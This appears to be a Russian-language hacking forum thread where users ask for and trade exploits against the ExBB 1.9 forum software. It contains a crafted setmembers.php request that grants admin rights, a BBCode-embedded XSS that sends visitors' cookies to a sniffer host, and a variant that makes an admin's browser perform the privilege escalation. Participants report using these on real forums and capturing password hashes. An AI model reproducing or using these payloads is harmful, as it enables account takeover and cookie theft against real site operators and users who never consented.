Вопрос про уязвимости в ExBB 1.9

Какие у него есть Xss ошибки?Или сплойты.Дайте пжл

 

вот тебе линки на видео -
раз
два

было еще, но щас уже его почуму-то нету=(

 

Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?

 

хы, чувак, сам себя лолишь...
почти ко всем видосам прилогается тхт файлик со всем что ты видел на экране в блокнотике ...
ыыыыыыыыыыыыы

 

Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.

 

а что ты тз того видео не наешь как сделать???
как из админки сделать себя админом..... хы.... можно скачать себе этот форум и сгенерить этот урл...

но если лень то пжалста...

Code:

setmembers.php?action=edit_user&checkaction=yes&userid=[Пишем сюда ID юзера]&membertitle=&[email protected]&newname=[тут должно быть новое имя]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC

на сколько я помню те КСС-ы у мя не работали чего-то вот ксс который работает

Code:

email]'style='display:none;background:url(javascript:document.images[2].src="[сниффер]?"+document.cookie)[/email]

подправь ксс а то тут его подпортить немнного пришлось чтобы видно было... ну суть думаю понятна

 

Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?

 

ну типа надо подождать немножко, пока админ просмотрит сообщение... или если у админа картинки отключены ничего не получится... ну или у админа броузер ОПЕРА... для оперы надо немного переделать КСС...

Code:

[*email]'style=background:url("javascript:document.images[0].src='setmembers.php?action=edit_user&checkaction=yes&userid=[ID]&membertitle=&[email protected]&newname=[ИМЯ]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC'");[/*email]

Вот это проверил -- работает... только свой ID поставь и ИМЯ. и про репу желательно помнить )

 

slime, репу я те плюснул, но что-то непохоже чтоб твоя ксс-ка меня админом сделала... последняя вообще отображается, добавил display:none - перестала, но я эту урлу тестил на нескольких форумах, и что-то пока не админ.. в чем может быть дело, есть какие-то идейки? Может знаешь, где копать? Буду весьма признателен

 

Парни, извините что в не тему, но вот сейчас проводил xss на ExBB 1.9.1 Снифер прошел хорошо, но дело в том, что хешь интересный, допустим пасс стоит 123456
хешь от него e10adc3949ba59abbe56e057f20f883e а приходит d41d8cd98f00b204e9800998ecf8427e , бред какойто, может кто подскажет, иль стукните в асю.
Я обычно в инвизбл сижу.

 

Парни, спасибо, можно не отвечать на вопрос, разобрался, это типа милкивей в 3-е вкусней, оказывается там соль+мд5 зашифровался еще раз в мд5(